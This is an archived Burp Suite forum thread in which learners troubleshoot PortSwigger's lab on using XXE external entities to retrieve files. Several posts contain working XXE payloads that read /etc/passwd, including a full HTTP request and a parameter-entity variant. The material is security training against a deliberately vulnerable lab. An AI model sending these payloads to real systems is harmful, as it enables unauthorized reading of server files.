Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: Exploiting XXE using external entities to retrieve files

Regan | Last updated: Jun 15, 2019 03:19PM UTC

Relevant Links: https://portswigger.net/web-security/xxe https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files I am trying to complete this lab and I an unsure what I am doing wrong. Any help would be greatly appreciated. I have tried may variants of the syntax, but basically, the HTTP request is below: ------------------------------------------- POST /product/stock HTTP/1.1 Host: acfc205d38843c2c80fd980100af0078.web-security-academy.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:42.0) Gecko/20100101 Firefox/42.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://acfc205d38843c2c80fd980100af0078.web-security-academy.net/product?productId=13 Cookie: session=aDJvRrAxYrf804mh6rJzMmjl2195R7IN Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 168 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <stockCheck><productId>&xxe;</productId></stockCheck> ------------------------------------------- Then I get the following response in Burp Suite: ------------------------------------------- HTTP/1.1 400 Bad Request Date: Sat, 15 Jun 2019 14:23:02 GMT Content-Type: application/json Content-Length: 86 Connection: close Content-Security-Policy: default-src 'self'; script-src 'self'; img-src 'self'; style-src 'self'; frame-src 'self'; connect-src 'self' ws://localhost:3333; font-src 'self'; media-src 'self'; object-src 'none'; child-src 'self' blob: X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: DENY "XML parser exited with non-zero code 1: Content is not allowed in trailing section. " ------------------------------------------- Thank you.

PortSwigger Agent | Last updated: Jun 17, 2019 08:09AM UTC

I just checked this lab and the solution is working correctly for me. Please ensure Repeater is configured to automatically update Content-Length

Burp User | Last updated: Jun 19, 2019 08:19PM UTC

Am getting the same results as Regan. Content-Length seems to be related to request headers not repeater. Can somebody help?

Burp User | Last updated: Jun 20, 2019 03:09AM UTC

Use repeater instead of intruder. I used the snippet below and got the expected results! <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

Burp User | Last updated: Dec 05, 2019 10:22AM UTC

Is it because you are using Windows? As Windows doesn't have files name /etc/passwd

Burp User | Last updated: Feb 09, 2020 08:52AM UTC

@Daniel You are using Web application, not accessing your own system. When you access any website. For ex: Facebook or Portswigger.net then it's depend on which server Portswigger are using not what operating system you're using. You just access their services via Browser. And Ans : <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <?xml version="1.0" encoding="UTF-8"?> <stockCheck> <productId>&xxe;</productId> <storeId>1</storeId> </stockCheck> or <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "file:///etc/passwd"> %xxe; ]> <?xml version="1.0" encoding="UTF-8"?> <stockCheck> <productId>1</productId> <storeId>1</storeId> </stockCheck>

yusuf | Last updated: May 16, 2021 12:08PM UTC